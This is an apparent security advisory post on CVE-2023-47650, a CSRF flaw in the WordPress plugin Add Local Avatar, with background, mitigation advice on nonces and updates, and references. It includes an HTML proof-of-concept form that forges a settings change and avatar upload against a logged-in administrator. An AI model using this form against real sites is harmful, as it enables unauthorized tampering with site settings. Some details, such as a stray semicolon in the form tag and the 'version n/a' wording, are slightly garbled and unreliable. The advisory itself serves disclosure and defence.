CVE-2023-47650: Critical CSRF Vulnerability in Peter Sterling Add Local Avatar Plugin (Versions <= 12.1)

A critical Cross-Site Request Forgery (CSRF) vulnerability (CVE-2023-47650) has been discovered in the Peter Sterling Add Local Avatar plugin. This security issue affects Add Local Avatar version n/a up to version 12.1. In this post, we will explore the details of this exploitation and provide you with the necessary information to address it and secure your WordPress-based website.

Background

Add Local Avatar is a popular WordPress plugin designed by Peter Sterling that allows users to upload and set local avatars for user profiles. It is a widely used plugin with more than 100,000 active installations. Unfortunately, it has been found to contain a CSRF vulnerability that could potentially expose user data, inserting malicious content, and even allow complete takeover of the affected website.

Exploit Details

The vulnerability exists due to insufficient validation of the user inputs and not implementing appropriate CSRF protection. As a result, an attacker can craft a malicious link or form submission that, if clicked or submitted by an authenticated user (mainly admins or authors), can alter core settings and upload unauthorized avatars.

Code Snippet

The following is a sample code snippet to demonstrate the exploitation of this CSRF vulnerability in the Add Local Avatar plugin:

<html>
  <body>
    <h1>PoC for CVE-2023-47650</h1>
    <form action="http://targetsite.com/wp-admin/options-general.php"; method="POST">
      <input type="hidden" name="MAX_FILE_SIZE" value="500000" />
      <input type="hidden" name="upload_image" value="1" />
      <input type="hidden" name="option_page" value="add_local_avatar_options" />
      <input type="hidden" name="action" value="update" />
      <input type="hidden" name="user_id" value="1" />
      <input type="file" name="local_avatar" />
      <input type="submit" value="Submit" />
    </form>
  </body>
</html>

By visiting the above webpage and submitting the form, you could potentially trigger the vulnerability if the target site's administrator is simultaneously logged in.

Mitigation

To mitigate this CSRF vulnerability in the Add Local Avatar plugin, it is recommended to take the following actions:

1. Update the plugin to the latest version if available (as of creating this post, version 12.1 is affected, and no update has been released yet).
2. Implement proper CSRF protection, such as using WordPress nonces, in the affected parts of the plugin that handle image uploads or other sensitive actions.
3. Educate users and administrators about the potential risks associated with CSRF and the importance of not clicking any suspicious links.

For more information on CSRF protection and nonces in WordPress, please refer to the official documentation: https://developer.wordpress.org/plugins/security/nonces/

Conclusion

The discovery of the CSRF vulnerability (CVE-2023-47650) in the Add Local Avatar plugin sheds light on the importance of implementing adequate security measures for popular plugins. By understanding the risks and taking immediate action, WordPress website owners and administrators can protect their sites from potential cyberattacks and maintain a secure online presence.

Please note: We recommend monitoring and following up on the latest updates on the official Add Local Avatar plugin repository and applying the latest security patches promptly.

Original References

1. CVE-2023-47650: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-47650
2. Add Local Avatar Plugin: https://wordpress.org/plugins/add-local-avatar/

Timeline

Published on: 11/18/2023 22:15:08 UTC
Last modified on: 11/27/2023 20:34:42 UTC